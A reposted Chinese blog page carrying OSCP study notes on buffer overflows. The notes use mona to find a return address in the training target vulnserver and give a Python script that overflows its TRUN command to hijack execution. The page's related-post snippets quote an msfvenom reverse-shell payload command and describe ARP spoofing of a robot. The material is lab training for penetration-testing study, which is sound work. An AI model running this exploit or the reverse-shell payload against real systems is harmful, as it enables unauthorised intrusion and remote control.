OSCP Learning Notes - Buffer Overflows(4)

最新推荐文章于 2025-08-07 15:08:44 发布
最新推荐文章于 2025-08-07 15:08:44 发布
阅读量129 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: python
原文链接:http://www.cnblogs.com/keepmoving1113/p/11117202.html
本文详细介绍如何使用Mona模块定位并利用软件漏洞。通过下载并配置Mona模块,设置断点,运行测试脚本,最终使目标服务器崩溃,演示了整个漏洞定位和利用的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Finding the Right Module(mona)

Mona Module Project website: https://github.com/corelan/mona

 1. Download mona.py, and drop it into the 'OyCommands' file.

2. Open the vulnserver and Immnity Debugger and attach the vulnserver.

3. Execute mona modules

 

625011af

Set the stop point on "625011af"

Then run the immunity debugger.

 4. Write the following Python test script, and perfom it on Kali Linux.

#!/usr/bin/python
import socket
import sys

shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect = s.connect(('10.0.0.XX',9999))
    s.send(('TRUN /.:/' + shellcode))
except:
    print "check debugger"
s.close()

 5. The vulnserver is crashed, 

 

转载于:https://www.cnblogs.com/keepmoving1113/p/11117202.html

javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
安装Kali上的工具在其他Debian系的Linux系统上
热门推荐
isinstance的博客
10-16 1万+
因为笔者是Debian系的用户,所有红帽系的东西没研究转载注明出处 http://blog.youkuaiyun.com/isinstance/article/details/52830169这也是在外网Google发现的方法,加上我使用的一些经验,翻译和加上一些自己的心得而成的在Github上有个项目,就是给其他linux系统的用户安装Kali上的工具的所以 第一步:我们先将这个仓库clone下来 sudo
OSCP Learning Notes - WebApp Exploitation(4)
weixin_30437337的博客
07-20 143
Local File Inclusion[LFI] TargetPentester Lab: Download from the following website: https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/ 1. Use netdiscover to ...
OSCP Learning Notes - Buffer Overflows(2)
weixin_30814223的博客
06-26 656
Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900 2.Write the python test sc...
OSCP Learning Notes - Buffer Overflows(1)
weixin_30849403的博客
06-23 195
Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver -https://github.com/stephenbradshaw/vulnserver Immunity Debuger -https://www.imm...
OSCP Learning Notes - Buffer Overflows(5)
weixin_30786657的博客
07-01 260
Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of Kali Linux. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.XXX LPORT=4444 EXITFUNC=thread -f ...
OSCP Learning Notes - Overview
weixin_30699443的博客
06-15 118
Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concepts Understanding of basic Linux syntax A "Try Harder" attitude Modules: Introduction to ...
java红酒网站源码-OSCP-PWK-Notes-Public:Optixal的进攻性安全认证专家(OSCP)/KaliLinux(PWK)
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
学习日志27 python
AYheyheyhey的博客
08-04 935
封装是 “隐藏内部细节”,解决数据安全和接口简化问题;多态是 “统一接口,不同实现”,解决代码灵活性和扩展性问题;二者常结合使用:封装为多态提供了基础(确保对象内部稳定),多态通过封装的接口实现灵活交互。
ORACLE复杂查询
ZZH1120KQ的博客
08-04 1577
在Oracle数据库中,逻辑判断和条件判断是两个密切相关但又不完全相同的概念。逻辑判断主要关注的是根据逻辑运算符(如AND、OR、NOT)对条件表达式的结果进行逻辑运算,从而得出最终的布尔值(true或false)。条件判断则更侧重于根据给定的条件或表达式来判断某个操作是否应该执行,或者应该执行哪个分支的操作。
JumpServer 堡垒机全流程搭建指南及常见问题解决方案
2401_83649605的博客
08-05 1330
文章详细介绍了JumpServer的技术架构和部署流程,包括基础环境配置、数据库安装等步骤。JumpServer采用分布式架构,支持多机房部署,无资产数量和并发限制,是企业IT安全运维的理想选择。
【笔记】ROS1|5 ARP攻击Turtlebot3汉堡Burger并解析移动报文【旧文转载】
shandianchengzi的博客
08-04 1077
本文介绍了如何使用ARP攻击技术干扰Turtlebot3汉堡机器人的ROS通信。作者首先讲解了ARP协议的基本原理和攻击依据,然后通过实验演示了如何利用arpspoof工具实施ARP欺骗攻击,包括干扰普通主机上网和小车与控制机的通信。文章提供了详细的实验步骤和思考题,并建议读者在虚拟机环境下进行实践。实验结果显示,通过持续发送虚假ARP响应包可以成功劫持网络通信,开启IP转发后虽能恢复但会降低网速。最后作者还演示了如何解析被攻击机器人的移动控制报文。
WebSocket 在多线程环境下处理 Session并发
最新发布
TOOZOOY的博客
08-07 427
WebSocket 在多线程环境下处理 Session并发时,常见问题包括状态冲突(如 IllegalStateException)、消息乱序、连接超时等。以下是综合各技术方案的解决方案,分为单机多线程和分布式集群两类场景:
YAML文件
2301_80251684的博客
08-04 458
YAML是一种数据序列化格式,常用于配置文件、数据交换和存储。其设计目标是简洁易读,同时支持复杂数据结构。
中文基于Qwen3-235B-2507蒸馏数据集的操作
二分掌柜的
08-04 840
flyfish
2025-08-04-零成本搭建 AI 应用!Hugging Face 免费 CPU 资源实战指南
个人技术
08-04 1155
本文介绍如何利用 Hugging Face 免费 CPU 资源部署应用:通过创建 Space 空间,选 2vCPU+16GB 内存配置,提交代码后自动构建,借助 Jupyter Notebook 运行程序。还讲解用 uptime-kuma 或 ClawCloud 定期访问保活,避免 48 小时无活动暂停,实现低成本应用部署。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-优快云博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值